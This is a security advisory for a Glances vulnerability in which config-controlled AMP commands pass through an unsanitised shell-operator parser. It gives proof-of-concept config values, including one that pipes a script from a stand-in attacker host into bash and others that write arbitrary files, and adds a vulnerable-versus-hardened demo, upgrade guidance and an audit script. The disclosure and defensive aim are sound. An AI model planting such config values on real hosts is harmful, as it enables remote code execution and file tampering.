High · 7.8 · CVE-2026-53925 · Jun 26, 2026

CVE-2026-53925: Glances Arbitrary File Write via secure_popen Operator Injection in AMP Configuration

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

Glances lets AMP module commands reach an internal shell-operator parser without any sanitization, so anyone who can write to glances.conf can overwrite arbitrary files or chain commands on the host.

Package: glances
Ecosystem: pip
Affected: >= 4.0.8, < 4.5.5
Fixed in: 4.5.5

The problem

The `secure_popen()` function in `glances/secure.py` implements its own mini-shell: it splits a command string on `>`, `|`, and `&&` and then runs each fragment with `subprocess.Popen(shell=False)`. The token that follows `>` becomes the stdout redirection target, and no validation at all is applied to that path.

AMP modules load their `command` and `service_cmd` values directly from `glances.conf` and pass them straight to `secure_popen()`. An attacker who can modify that config file can therefore write arbitrary content to any file the Glances process can reach, pipe output to any program, or chain extra commands.

The existing `--disable-config-exec` flag (added for CVE-2026-33641) does not help here. It only blocks backtick execution inside `config.get_value()`. A value like `echo x > /etc/crontab` contains no backticks and flows through unchanged.

Proof of concept

```bash
# glances.conf (attacker-controlled)
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/pwned

# secure_popen() splits on '>' and calls:
#   subprocess.Popen(['echo', 'POC_ARBITRARY_FILE_WRITE'], stdout=open('/tmp/pwned', 'w'))

# Command chaining variant
command=echo x && curl http://attacker.com/shell.sh | bash

# SystemV AMP variant (glances/amps/systemv/__init__.py:60)
[amp_systemv]
service_cmd=id > /tmp/pwned
```

The root cause (CWE-22) is in `__secure_popen()` at `glances/secure.py` lines 39-45 and 69-72: after splitting on `>`, the path token is used directly in `open(stdout_redirect, 'w')` with no `os.path.realpath` check or allowed-directory guard.

The fix in 4.5.5 drops the operator parsing from `secure_popen()` entirely: the affected call sites run `subprocess.run(shell=False)` with an explicit argument list, so `>`, `|`, and `&&` in a config value reach the child process as ordinary arguments rather than control operators, and the redirection/chaining path never executes.
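The contrast between the two behaviours, as an added example that is not code from Glances or from the advisory author. `vulnerable_popen()` is a constructed, simplified stand-in for the operator-parsing path described above (split on `&&`, honour `>` as a stdout redirection, validate nothing), not the real `secure_popen()`; `hardened_run()` is the `shlex.split()` + `subprocess.run(shell=False)` shape the fix moves to. It assumes a POSIX host with `echo` and `touch` on PATH and writes only into a temporary directory it creates and removes itself.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed, simplified stand-in for the operator-parsing behaviour the
# advisory describes in secure_popen(): split on '&&', honour '>' as a stdout
# redirection, validate nothing. This is NOT the project's code; it exists to
# show what an attacker-controlled `command=` value turns into.
def vulnerable_popen(cmd: str) -> list:
    executed = []
    for segment in cmd.split("&&"):
        left, sep, target = segment.partition(">")
        argv = shlex.split(left)
        if sep:
            # The redirection target is taken verbatim from the config value:
            # no os.path.realpath(), no allowed-directory check.
            with open(target.strip(), "w") as out:
                subprocess.run(argv, stdout=out, check=False)
        else:
            subprocess.run(argv, capture_output=True, check=False)
        executed.append(argv)
    return executed


# Hardened form, in the spirit of the 4.5.5 fix: tokenise once, run with
# shell=False, and never interpret the tokens. '>', '|' and '&&' are plain
# argv strings here, so they reach the child as literal arguments.
def hardened_run(cmd: str) -> str:
    argv = shlex.split(cmd)
    proc = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, check=False)
    return proc.stdout.strip()


def demo() -> dict:
    """Run the same attacker-controlled value through both paths and report
    what each one actually did on disk."""
    with tempfile.TemporaryDirectory() as workdir:
        target = os.path.join(workdir, "pwned")     # stands in for /tmp/pwned
        marker = os.path.join(workdir, "chained")   # proves '&&' chaining ran
        # Constructed attacker-controlled command= value, as in the PoC above.
        cfg_value = f"echo POC_ARBITRARY_FILE_WRITE > {target} && touch {marker}"

        executed = vulnerable_popen(cfg_value)
        vuln_written = os.path.isfile(target)
        vuln_content = open(target).read().strip() if vuln_written else None
        vuln_chained = os.path.isfile(marker)
        for path in (target, marker):
            if os.path.exists(path):
                os.remove(path)

        stdout = hardened_run(cfg_value)
        return {
            "vulnerable_executed": executed,
            "vulnerable_wrote_file": vuln_written,
            "vulnerable_file_content": vuln_content,
            "vulnerable_chained": vuln_chained,
            "hardened_stdout": stdout,
            "hardened_wrote_file": os.path.isfile(target),
            "hardened_chained": os.path.isfile(marker),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the vulnerable path creating the target file with the echoed content and executing the chained `touch`, while the hardened path creates nothing: `echo` simply prints the whole value, `>` and `&&` included, because nothing between the config and the child process treats them as operators.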

The fix

Upgrade to Glances 4.5.5 (released 13 June 2026). The patch replaces the `secure_popen()` call sites in `amps/default/__init__.py` and `amps/systemv/__init__.py` with `subprocess.run(shell=False)` and explicit argument arrays, removing the operator-parsing logic entirely.

As a defence-in-depth measure, restrict write access to `glances.conf` to the Glances service account only, and run Glances under a dedicated low-privilege user rather than root. Treat write access to that file as equivalent to command execution as the Glances account: the hardening limits the blast radius, it does not replace the upgrade.
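A quick audit for existing deployments, added here as example code rather than anything shipped with Glances or written by the advisory author. It parses a `glances.conf`, looks at every `amp_*` section's `command` and `service_cmd` value, and flags values containing the operators `secure_popen()` is described as parsing. It also records whether the value contains a backtick, since that is the only thing `--disable-config-exec` is said to guard; the point (from the paragraph on that flag above) is that every real finding here has none. The config text is constructed for the example and mirrors the proof of concept.

```python
import configparser

# Operators the advisory says secure_popen() interprets. Constructed list for
# this audit; extend it if your parser honours more.
PARSED_OPERATORS = ("&&", ">", "|")

# Constructed glances.conf excerpt: one benign AMP plus the three values from
# the proof of concept above.
SAMPLE_CONF = """\
[amp_nginx]
enable=true
regex=.*nginx
refresh=60
command=nginx -v

[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/pwned

[amp_systemv]
enable=true
regex=.*
refresh=3
service_cmd=id > /tmp/pwned

[amp_chain]
enable=true
regex=.*
refresh=3
command=echo x && curl http://attacker.com/shell.sh | bash
"""


def audit_amp_commands(conf_text: str) -> list:
    """Return one finding per AMP `command`/`service_cmd` value that contains
    a parsed operator. `has_backticks` records whether the value would even be
    touched by --disable-config-exec, which (per the advisory) only guards
    backtick execution in config.get_value()."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(conf_text)
    findings = []
    for section in parser.sections():
        if not section.startswith("amp_"):
            continue
        for key in ("command", "service_cmd"):
            value = parser.get(section, key, fallback=None)
            if value is None:
                continue
            operators = [op for op in PARSED_OPERATORS if op in value]
            if operators:
                findings.append({
                    "section": section,
                    "key": key,
                    "value": value,
                    "operators": operators,
                    "has_backticks": "`" in value,
                })
    return findings


if __name__ == "__main__":
    for f in audit_amp_commands(SAMPLE_CONF):
        note = "" if f["has_backticks"] else " (not caught by --disable-config-exec)"
        print(f"[{f['section']}] {f['key']}={f['value']!r} "
              f"operators={f['operators']}{note}")
```

On a live host, read the real file with `open("/etc/glances/glances.conf").read()` (or wherever your deployment keeps it) and feed it to `audit_amp_commands()`; any finding on a version below 4.5.5 is a value that will be executed with redirection or chaining honoured.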

Reported by MichaIng.
